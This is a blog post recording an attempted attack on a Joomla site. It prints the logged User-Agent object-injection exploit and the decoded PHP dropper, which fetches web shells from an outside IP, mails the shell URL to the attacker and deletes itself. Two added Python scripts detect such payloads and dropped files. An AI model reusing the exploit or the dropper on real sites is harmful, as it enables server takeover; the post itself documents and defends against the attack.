daknetworks.com


Hacking Attempt 16-06

Here's another hacking attempt on another hosted web site. This attempt came from 74.208.47.52, which at the time resolved to catchmeapp.com.

NOTE: Often the attacking web site is not the perpetrator but has itself been hacked. This makes it hard to discover the real hacker.

==========================
GET / HTTP/1.1" 301 236 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimp
lepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_u
rl\";s:3810:\"eval(base64_decode('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbGlicmFyaWVzL2pvb21sYS9sb2wucGhwIiA7DQokZnA9Zm9wZW4oIiRjaGVjayIsIncrIik7
DQpmd3JpdGUoJGZwLGJhc2U2NF9kZWNvZGUoJ1BEOXdhSEFOQ21aMWJtTjBhVzl1SUdoMGRIQmZaMlYwS0NSMWNtd3BldzBLQ1NScGJTQTlJR04xY214ZmFXNXBkQ2drZFhKc0tUc05DZ2xqZFhKc1gzTmxkRz
l3ZENna2FXMHNJRU5WVWt4UFVGUmZVa1ZVVlZKT1ZGSkJUbE5HUlZJc0lERXBPdzBLQ1dOMWNteGZjMlYwYjNCMEtDUnBiU3dnUTFWU1RFOVFWRjlEVDA1T1JVTlVWRWxOUlU5VlZDd2dNVEFwT3cwS0NXTjFj
bXhmYzJWMGIzQjBLQ1JwYlN3Z1ExVlNURTlRVkY5R1QweE1UMWRNVDBOQlZFbFBUaXdnTVNrN0RRb0pZM1Z5YkY5elpYUnZjSFFvSkdsdExDQkRWVkpNVDFCVVgwaEZRVVJGVWl3Z01DazdEUW9KY21WMGRYSn
VJR04xY214ZlpYaGxZeWdrYVcwcE93MEtDV04xY214ZlkyeHZjMlVvSkdsdEtUc05DbjBOQ2lSamFHVmpheUE5SUNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwyeHBZbkpoY21sbGN5
OXFiMjl0YkdFdlkzTnpMbkJvY0NJZ093MEtKSFJsZUhRZ1BTQm9kSFJ3WDJkbGRDZ25hSFIwY0Rvdkx6YzBMakl3T0M0ME55NDFNaTluWlhRdlkzTnpMblI0ZENjcE93MEtKRzl3Wlc0Z1BTQm1iM0JsYmlna1
kyaGxZMnNzSUNkM0p5azdEUXBtZDNKcGRHVW9KRzl3Wlc0c0lDUjBaWGgwS1RzTkNtWmpiRzl6WlNna2IzQmxiaWs3RFFwcFppaG1hV3hsWDJWNGFYTjBjeWdrWTJobFkyc3BLWHNOQ2lBZ0lDQmxZMmh2SUNS
amFHVmpheTRpUEM5aWNqNGlPdzBLZldWc2MyVWdEUW9nSUdWamFHOGdJbTV2ZENCbGVHbDBjeUk3RFFwbFkyaHZJQ0prYjI1bElDNWNiaUFpSURzTkNpUmphR1ZqYXpJZ1BTQWtYMU5GVWxaRlVsc25SRTlEVl
UxRlRsUmZVazlQVkNkZElDNGdJaTlzYVdKeVlYSnBaWE12YW05dmJXeGhMMnB0WVdsc0xuQm9jQ0lnT3cwS0pIUmxlSFF5SUQwZ2FIUjBjRjluWlhRb0oyaDBkSEE2THk4M05DNHlNRGd1TkRjdU5USXZaMlYw
TDIwdWRIaDBKeWs3RFFva2IzQmxiaklnUFNCbWIzQmxiaWdrWTJobFkyc3lMQ0FuZHljcE93MEtabmR5YVhSbEtDUnZjR1Z1TWl3Z0pIUmxlSFF5S1RzTkNtWmpiRzl6WlNna2IzQmxiaklwT3cwS2FXWW9abW
xzWlY5bGVHbHpkSE1vSkdOb1pXTnJNaWtwZXcwS0lDQWdJR1ZqYUc4Z0pHTm9aV05yTWk0aVBDOWljajRpT3cwS2ZXVnNjMlVnRFFvZ0lHVmphRzhnSW01dmRDQmxlR2wwY3pJaU93MEtaV05vYnlBaVpHOXVa
VElnTGx4dUlDSWdPdzBLRFFva1kyaGxZMnN6UFNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwzY3VhSFJ0SWlBN0RRb2tkR1Y0ZERNZ1BTQm9kSFJ3WDJkbGRDZ25hSFIwY0Rvdkx6Yz
BMakl3T0M0ME55NDFNaTluWlhRdmR5NTBlSFFuS1RzTkNpUnZjRE05Wm05d1pXNG9KR05vWldOck15d2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQXpMQ1IwWlhoME15azdEUXBtWTJ4dmMyVW9KRzl3TXlrN0RR
b05DaVJqYUdWamF6UTlKRjlUUlZKV1JWSmJKMFJQUTFWTlJVNVVYMUpQVDFRblhTQXVJQ0l2YkdsaWNtRnlhV1Z6TDJwdmIyMXNZUzlqYUdWamF5NXdhSEFpSURzTkNpUjBaWGgwTkNBOUlHaDBkSEJmWjJWME
tDZG9kSFJ3T2k4dk56UXVNakE0TGpRM0xqVXlMMmRsZEM5akxuUjRkQ2NwT3cwS0pHOXdORDFtYjNCbGJpZ2tZMmhsWTJzMExDQW5keWNwT3cwS1puZHlhWFJsS0NSdmNEUXNKSFJsZUhRMEtUc05DbVpqYkc5
elpTZ2tiM0EwS1RzTkNnMEtKR05vWldOck5UMGtYMU5GVWxaRlVsc25SRTlEVlUxRlRsUmZVazlQVkNkZElDNGdJaTlzYVdKeVlYSnBaWE12YW05dmJXeGhMMnB0WVdsc2N5NXdhSEFpSURzTkNpUjBaWGgwTl
NBOUlHaDBkSEJmWjJWMEtDZG9kSFJ3T2k4dk56UXVNakE0TGpRM0xqVXlMMmRsZEM5dGJTNTBlSFFuS1RzTkNpUnZjRFU5Wm05d1pXNG9KR05vWldOck5Td2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQTFMQ1Iw
WlhoME5TazdEUXBtWTJ4dmMyVW9KRzl3TlNrN0RRb05DaVJqYUdWamF6WTlKRjlUUlZKV1JWSmJKMFJQUTFWTlJVNVVYMUpQVDFRblhTQXVJQ0l2YkdsaWNtRnlhV1Z6TDJwdmIyMXNZUzlxZFhObGNpNXdhSE
FpSURzTkNpUjBaWGgwTmlBOUlHaDBkSEJmWjJWMEtDZG9kSFJ3T2k4dk56UXVNakE0TGpRM0xqVXlMMmRsZEM5MWMyVnlMblI0ZENjcE93MEtKRzl3TmoxbWIzQmxiaWdrWTJobFkyczJMQ0FuZHljcE93MEta
bmR5YVhSbEtDUnZjRFlzSkhSbGVIUTJLVHNOQ21aamJHOXpaU2drYjNBMktUc05DZzBLSkhSdmVpQTlJQ0puWVdKaWVTNWpZWE5vUUhsaGJtUmxlQzVqYjIwc2IyeHZhbVZ6YUdGcllYSmhRR2R0WVdsc0xtTn
ZiU0k3RFFva2MzVmlhbVZqZENBOUlDZEtiMjBnZW5wNklDY2dMaUFrWDFORlVsWkZVbHNuVTBWU1ZrVlNYMDVCVFVVblhUc05DaVJvWldGa1pYSWdQU0FuWm5KdmJUb2dTMlZyYTJGcElGTmxibk5sYmlBOGRt
OXVVbVZwYm1obGNucExiR0YxYzBCVFlXbHJiM1Z1WVVocFlta3VZMjl0UGljZ0xpQWlYSEpjYmlJN0RRb2tiV1Z6YzJGblpTQTlJQ0pUYUdWc2JIb2dPaUJvZEhSd09pOHZJaUF1SUNSZlUwVlNWa1ZTV3lkVF
JWSldSVkpmVGtGTlJTZGRJQzRnSWk5c2FXSnlZWEpwWlhNdmFtOXZiV3hoTDJwdFlXbHNMbkJvY0Q5MUlpQXVJQ0pjY2x4dUlpQXVJSEJvY0Y5MWJtRnRaU2dwSUM0Z0lseHlYRzRpT3cwS0pITmxiblJ0WVds
c0lEMGdRRzFoYVd3b0pIUnZlaXdnSkhOMVltcGxZM1FzSUNSdFpYTnpZV2RsTENBa2FHVmhaR1Z5S1RzTkNnMEtRSFZ1YkdsdWF5aGZYMFpKVEVWZlh5azdEUW9OQ2cwS1B6ND0nKSk7DQpmY2xvc2UoJGZwKT
s='));JFactory::getConfig();exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s
:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\xfd\xfd\xfd"
===============================================
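As an added example (not code from the original post), here is a small Python log scanner that flags the User-Agent pattern in the request above and unwraps the nested eval(base64_decode('...')) stages. The marker strings are taken from the logged request; the access-log line, the client IP (TEST-NET 203.0.113.7) and the two payload stages it decodes are constructed for the demo and are not the blob from the real log.

```python
import base64
import binascii
import re

# Strings from the request logged above that mark the Joomla User-Agent
# object-injection payload; a normal browser UA contains none of them.
SUSPICIOUS_UA_MARKERS = (
    "}__test|",                       # terminator that breaks the serialized session
    'O:21:"JDatabaseDriverMysqli"',   # first object of the gadget chain
    "disconnectHandlers",             # property holding the callback that fires on destruct
    "eval(base64_decode(",            # the staged loader itself
)

# base64_decode('<blob>') as it appears in each unwrapped layer
B64_CALL_RE = re.compile(r"base64_decode\('([A-Za-z0-9+/=]+)'\)")

# Combined-log fields are double-quoted; backslash escapes (\" \\ \x..) must not end a field.
QUOTED_FIELD_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')


def extract_user_agent(log_line):
    """Return the last double-quoted field of a combined-format access log line."""
    fields = QUOTED_FIELD_RE.findall(log_line)
    return fields[-1] if fields else ""


def unescape_log_field(field):
    """Undo the \\" escaping Apache applies inside quoted log fields."""
    return field.replace('\\"', '"')


def matched_markers(user_agent):
    """List which payload markers appear in a User-Agent string."""
    ua = unescape_log_field(user_agent)
    return [m for m in SUSPICIOUS_UA_MARKERS if m in ua]


def unwrap_stages(user_agent, max_depth=5):
    """Decode nested base64_decode('...') layers; returns stages outermost first."""
    text = unescape_log_field(user_agent)
    stages = []
    for _ in range(max_depth):
        m = B64_CALL_RE.search(text)
        if not m:
            break
        try:
            text = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            break  # malformed blob: stop rather than guess
        stages.append(text)
    return stages


# --- constructed sample (hypothetical, mirrors the structure of the real payload) ---
def _b64(s):
    return base64.b64encode(s.encode()).decode()

STAGE2_SRC = '<?php echo "stage two placeholder"; ?>'
STAGE1_SRC = (
    "$check = $_SERVER['DOCUMENT_ROOT'] . \"/libraries/joomla/lol.php\";"
    "$fp=fopen($check,\"w+\");fwrite($fp,base64_decode('" + _b64(STAGE2_SRC) + "'));fclose($fp);"
)
FEED_URL = "eval(base64_decode('" + _b64(STAGE1_SRC) + "'));JFactory::getConfig();exit"
SAMPLE_UA = (
    r'}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}'
    r's:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{'
    r's:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}'
    r's:8:\"feed_url\";s:' + str(len(FEED_URL)) + r':\"' + FEED_URL + r'\";'
    r's:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;'
    r's:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}'
    r's:13:\"\\0\\0\\0connection\";b:1;}\xf0\xfd\xfd\xfd'
)
SAMPLE_LOG = (
    '203.0.113.7 - - [16/Jun/2016:10:00:00 +0000] "GET / HTTP/1.1" 301 236 "-" "'
    + SAMPLE_UA + '"'
)


def triage(log_line):
    """One-call summary for a log line: markers hit and the decoded stages."""
    ua = extract_user_agent(log_line)
    return {"markers": matched_markers(ua), "stages": unwrap_stages(ua)}


if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    print("markers:", result["markers"])
    for i, stage in enumerate(result["stages"], 1):
        print(f"--- stage {i} ---\n{stage}")
```

Run over a real access log, feed each line to triage(); any line with a non-empty markers list deserves a look, and the decoded stages show what the attacker tried to write to disk without having to execute anything.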

The base64 string inside eval(base64_decode('...')) decodes to:

===============================================
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/lol.php" ;
$fp=fopen("$check","w+");
fwrite($fp,base64_decode('...')); /* long base64 blob omitted here */
fclose($fp);
================================================

The inner base64 blob decodes, in turn, to:

================================================

<?php
function http_get($url){
    $im = curl_init($url);
    curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($im, CURLOPT_HEADER, 0);
    return curl_exec($im);
    curl_close($im);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/css.php" ;
$text = http_get('http://74.208.47.52/get/css.txt');
$open = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
    echo $check."</br>";
}else
  echo "not exits";
echo "done .\n " ;
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmail.php" ;
$text2 = http_get('http://74.208.47.52/get/m.txt');
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
    echo $check2."</br>";
}else
  echo "not exits2";
echo "done2 .\n " ;

$check3=$_SERVER['DOCUMENT_ROOT'] . "/w.htm" ;
$text3 = http_get('http://74.208.47.52/get/w.txt');
$op3=fopen($check3, 'w');
fwrite($op3,$text3);
fclose($op3);

$check4=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/check.php" ;
$text4 = http_get('http://74.208.47.52/get/c.txt');
$op4=fopen($check4, 'w');
fwrite($op4,$text4);
fclose($op4);

$check5=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmails.php" ;
$text5 = http_get('http://74.208.47.52/get/mm.txt');
$op5=fopen($check5, 'w');
fwrite($op5,$text5);
fclose($op5);

$check6=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/juser.php" ;
$text6 = http_get('http://74.208.47.52/get/user.txt');
$op6=fopen($check6, 'w');
fwrite($op6,$text6);
fclose($op6);

$toz = "[e-mail address cloaked by the blog's anti-spam plugin],[e-mail address cloaked by the blog's anti-spam plugin]";
$subject = 'Jom zzz ' . $_SERVER['SERVER_NAME'];
$header = 'from: Kekkai Sensen <[e-mail address cloaked by the blog's anti-spam plugin]>' . "\r\n";
$message = "Shellz : http://" . $_SERVER['SERVER_NAME'] . "/libraries/joomla/jmail.php?u" . "\r\n" . php_uname() . "\r\n";
$sentmail = @mail($toz, $subject, $message, $header);

@unlink(__FILE__);


?>
===============================================
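As an added example (not code from the original post), here is a Python check a site owner could run against a Joomla document root after seeing a request like this one. It looks for the exact files the decoded dropper above writes, and scans every .php file for the dropper's three source-level traits (a staged eval(base64_decode(...)) loader, a curl_init(...)/fwrite(...) fetch-and-write, and @unlink(__FILE__) self-deletion). The dropped paths come from the code above; the temporary directory, the inert sample dropper and the 203.0.113.7 address in it are constructed for the demo.

```python
import os
import re
import tempfile

# Paths the decoded dropper writes, relative to DOCUMENT_ROOT (all taken from the code above).
DROPPED_PATHS = (
    "libraries/joomla/lol.php",
    "libraries/joomla/css.php",
    "libraries/joomla/jmail.php",
    "libraries/joomla/jmails.php",
    "libraries/joomla/juser.php",
    "libraries/joomla/check.php",
    "w.htm",
)

# Source-level traits of the dropper: staged loader, fetch-then-write, self-deletion.
LOADER_PATTERNS = {
    "eval_base64": re.compile(r"eval\s*\(\s*base64_decode\s*\("),
    "fetch_and_write": re.compile(r"curl_init\s*\(.*?fwrite\s*\(", re.S),
    "self_delete": re.compile(r"@?unlink\s*\(\s*__FILE__\s*\)"),
}


def find_dropped_files(docroot):
    """Which of the known dropped paths exist under docroot."""
    return [p for p in DROPPED_PATHS if os.path.isfile(os.path.join(docroot, p))]


def loader_traits(source):
    """Names of the dropper traits present in one PHP source string."""
    return [name for name, rx in LOADER_PATTERNS.items() if rx.search(source)]


def scan_php_sources(docroot):
    """Map every .php file under docroot that shows a trait to its list of traits."""
    hits = {}
    for dirpath, _dirs, files in os.walk(docroot):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                traits = loader_traits(fh.read())
            if traits:
                hits[os.path.relpath(path, docroot).replace(os.sep, "/")] = traits
    return hits


# Constructed sample: an inert stand-in with the same traits as the decoded dropper.
SAMPLE_DROPPER = """<?php
if (false) { eval(base64_decode('AA==')); }
$im = curl_init('http://203.0.113.7/get/css.txt');
$fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/libraries/joomla/css.php', 'w');
fwrite($fp, curl_exec($im));
fclose($fp);
@unlink(__FILE__);
"""

# Constructed sample of a legitimate-looking library file with none of the traits.
SAMPLE_CLEAN = "<?php\nclass JFactory { public static function getConfig() { return null; } }\n"


def demo():
    """Build a throwaway Joomla-like tree, plant the sample dropper as lol.php, scan it."""
    with tempfile.TemporaryDirectory() as root:
        lib = os.path.join(root, "libraries", "joomla")
        os.makedirs(lib)
        with open(os.path.join(lib, "factory.php"), "w") as fh:
            fh.write(SAMPLE_CLEAN)
        with open(os.path.join(lib, "lol.php"), "w") as fh:
            fh.write(SAMPLE_DROPPER)
        return {"dropped": find_dropped_files(root), "sources": scan_php_sources(root)}


if __name__ == "__main__":
    print(demo())
```

On a real site, call find_dropped_files() and scan_php_sources() with the actual DOCUMENT_ROOT. Note that the dropper deletes itself (@unlink(__FILE__)) after running, so the absence of lol.php proves nothing; the files it fetched and the web server's access log are the durable evidence.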

Nice try... but not this time.